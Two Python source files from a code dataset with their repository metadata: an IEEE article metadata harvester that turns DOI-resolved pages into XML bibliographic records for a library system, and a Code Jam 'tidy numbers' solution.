|
/active/ieee_picker.py
|
365e7c5efc90e338a2f4d230b93c5f08faf084fa
|
[] |
no_license
|
fschwenn/ejlmod
|
fbf4692b857f9f056f9105a7f616a256725f03b6
|
ef17512c2e44baa0164fdc6abc997c70ed3d2a74
|
refs/heads/master
| 2023-01-24T18:56:35.581517
| 2023-01-20T11:18:16
| 2023-01-20T11:18:16
| 91,459,496
| 1
| 1
| null | 2021-10-04T11:58:15
| 2017-05-16T13:06:57
|
Python
|
UTF-8
|
Python
| false
| false
| 6,203
|
py
|
# -*- coding: utf-8 -*-
#program to harvest individual IEEE articles bei DOIs
#FS: 2018-01-26
import getopt
import sys
import os
import urllib2
import urlparse
from bs4 import BeautifulSoup
import re
import ejlmod2
import codecs
import time
import datetime
import json
xmldir = '/afs/desy.de/user/l/library/inspire/ejl'
retfiles_path = "/afs/desy.de/user/l/library/proc/retinspire/retfiles"
now = datetime.datetime.now()
stampoftoday = '%4d-%02d-%02d' % (now.year, now.month, now.day)
publisher = 'IEEE'
jnlfilename = 'ieee_picker-%s' % (stampoftoday)
urltrunc = "http://ieeexplore.ieee.org"
dois = sys.argv[1:]
def meta_with_name(tag):
return tag.name == 'meta' and tag.has_attr('name')
def fsunwrap(tag):
try:
for i in tag.find_all('i'):
cont = i.string
i.replace_with(cont)
except:
print 'fsunwrap-i-problem'
try:
for b in tag.find_all('b'):
cont = b.string
b.replace_with(cont)
except:
print 'fsunwrap-b-problem'
try:
for sup in tag.find_all('sup'):
cont = sup.string
sup.replace_with('^'+cont)
except:
print 'fsunwrap-sup-problem'
try:
for sub in tag.find_all('sub'):
cont = sub.string
sub.replace_with('_'+cont)
except:
print 'fsunwrap-sub-problem'
try:
for form in tag.find_all('formula',attrs={'formulatype': 'inline'}):
form.replace_with(' [FORMULA] ')
except:
print 'fsunwrap-form-problem'
return tag
def referencetostring(reference):
refstring = re.sub('\s+',' ',fsunwrap(reference).prettify())
refstring = re.sub('<li> *(.*) *<br.*',r'\1',refstring)
for a in reference.find_all('a'):
if a.has_attr('href') and re.search('dx.doi.org\/',a['href']):
refstring += ', doi: %s' % (re.sub('.*dx.doi.org\/','',a['href']))
return refstring
recs = []
i = 0
for doi in dois:
i += 1
print '---{ %i/%i }---{ %s}------' % (i, len(dois), doi)
tc = 'P'
rec = {'keyw' : [], 'autaff' : [], 'tc' : tc}
try:
articlepage = BeautifulSoup(urllib2.urlopen('http://dx.doi.org/%s' % (doi),timeout=300))
time.sleep(6)
except:
print "retry in 60 seconds"
time.sleep(60)
articlepage = BeautifulSoup(urllib2.urlopen('http://dx.doi.org/%s' % (doi),timeout=300))
#metadata now in javascript
for script in articlepage.find_all('script', attrs = {'type' : 'text/javascript'}):
if re.search('global.document.metadata', script.text):
gdm = re.sub('[\n\t]', '', script.text).strip()
gdm = re.sub('.*global.document.metadata=(\{.*\}).*', r'\1', gdm)
gdm = json.loads(gdm)
rec['jnl'] = gdm['publicationTitle']
if rec['jnl'] == 'IEEE Computer Graphics and Applications':
rec['jnl'] = 'IEEE Comp.Graph.App.'
elif rec['jnl'] == 'IEEE Sensors Journal':
rec['jnl'] = 'IEEE Sensors J.'
elif rec['jnl'] == 'IEEE Transactions on Applied Superconductivity':
rec['jnl'] = 'IEEE Trans.Appl.Supercond.'
elif rec['jnl'] == 'IEEE Transactions on Circuits and Systems I: Regular Papers':
rec['jnl'] = 'IEEE Trans.Circuits Theor.'
elif rec['jnl'] == 'IEEE Transactions on Magnetics':
rec['jnl'] = 'IEEE Trans.Magnetics'
elif rec['jnl'] == 'IEEE Transactions on Nuclear Science':
rec['jnl'] = 'IEEE Trans.Nucl.Sci.'
elif rec['jnl'] == 'Journal of Lightwave Technology':
rec['jnl'] = 'J.Lightwave Tech.'
else:
rec['jnl'] = 'BOOK'
if gdm.has_key('authors'):
for author in gdm['authors']:
autaff = [author['name']]
if author.has_key('affiliation'):
autaff.append(author['affiliation'])
if author.has_key('orcid'):
autaff.append('ORCID:'+author['orcid'])
rec['autaff'].append(autaff)
if rec['jnl'] in ['IEEE Trans.Magnetics', 'IEEE Trans.Appl.Supercond.']:
if gdm.has_key('externalId'):
rec['p1'] = gdm['externalId']
elif gdm.has_key('articleNumber'):
rec['p1'] = gdm['articleNumber']
else:
rec['p1'] = gdm['startPage']
rec['p2'] = gdm['endPage']
else:
if gdm.has_key('endPage'):
rec['p1'] = gdm['startPage']
rec['p2'] = gdm['endPage']
elif gdm.has_key('externalId'):
rec['p1'] = gdm['externalId']
else:
rec['p1'] = gdm['articleNumber']
if gdm['isFreeDocument']:
rec['FFT'] = urltrunc + gdm['pdfPath']
rec['tit'] = gdm['formulaStrippedArticleTitle']
if gdm.has_key('abstract'):
rec['abs'] = gdm['abstract']
## mistake in metadata
if re.search('\d+ pp', gdm['startPage']):
rec['pages'] = re.sub(' .*', '', gdm['startPage'])
rec['p1'] = str(int(gdm['endPage']) - int(rec['pages']) + 1)
else:
try:
rec['pages'] = int(re.sub(' .*', '', gdm['endPage'])) - int(gdm['startPage']) + 1
except:
pass
rec['doi'] = gdm['doi']
if gdm.has_key('keywords'):
for kws in gdm['keywords']:
for kw in kws['kwd']:
if not kw in rec['keyw']:
rec['keyw'].append(kw)
try:
rec['date'] = re.sub('\.', '', gdm['journalDisplayDateOfPublication'])
except:
rec['date'] = re.sub('\.', '', gdm['publicationDate'])
rec['year'] = rec['date'][-4:]
if gdm.has_key('issue'):
rec['issue'] = gdm['issue']
if gdm.has_key('volume'):
rec['vol'] = gdm['volume']
if gdm['isConference']:
rec['tc'] = 'C'
rec['note'] = [gdm['publicationTitle']]
recs.append(rec)
#closing of files and printing
xmlf = os.path.join(xmldir,jnlfilename+'.xml')
xmlfile = codecs.EncodedFile(codecs.open(xmlf,mode='wb'),'utf8')
ejlmod2.writenewXML(recs,xmlfile,publisher, jnlfilename)
xmlfile.close()
#retrival
retfiles_text = open(retfiles_path,"r").read()
line = jnlfilename+'.xml'+ "\n"
if not line in retfiles_text:
retfiles = open(retfiles_path,"a")
retfiles.write(line)
retfiles.close()
|
[
"florian.schwennsen@desy.de"
] |
florian.schwennsen@desy.de
|
59c077a63d563e4e4f1ae1c02b2bb9e3d7f9a62f
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_200/3922.py
|
6c513e10347dca58684665070d3a5aafe553781e
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,226
|
py
|
# from __future__ import print_function
import os
import sys
def smallest_tidy_n(n_str):
# for the single digit special case
if len(n_str) == 1:
return n_str
# special case: identical digits
if n_str == n_str[0] * len(n_str):
return n_str
# for the special case of something like:
# 110, 101, 100
# ( answer in these cases is 99)
for i in range(len(n_str)):
if int(n_str[i]) > 1 :
break
if i == len(n_str)-1:
return "9" * (len(n_str) - 1)
res = n_str[0]
for i in range(len(n_str)-2, -1, -1):
if int(n_str[i+1]) < int(n_str[i]):
# print(12312312)
return smallest_tidy_n( n_str[0:i] + str(int(n_str[i])-1) + "9" * (len(n_str)-i-1) )
return n_str
def remove_trailing_zeros(n_str):
start = 0
for i in range(len(n_str)):
if n_str[i] == '0':
start = i+1
break
return n_str[start:]
f = open(sys.argv[1])
outf = open(sys.argv[1] + ".out", 'w')
n = int(f.readline())
#
for nth in range(n):
num_str = f.readline().strip()
tidy = smallest_tidy_n(num_str)
tidy = remove_trailing_zeros(tidy)
res = "Case #%d: %s" % (nth+1, tidy)
# print(num_str)
# print(res)
if nth < n-1:
res = res + "\n"
outf.write(res)
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.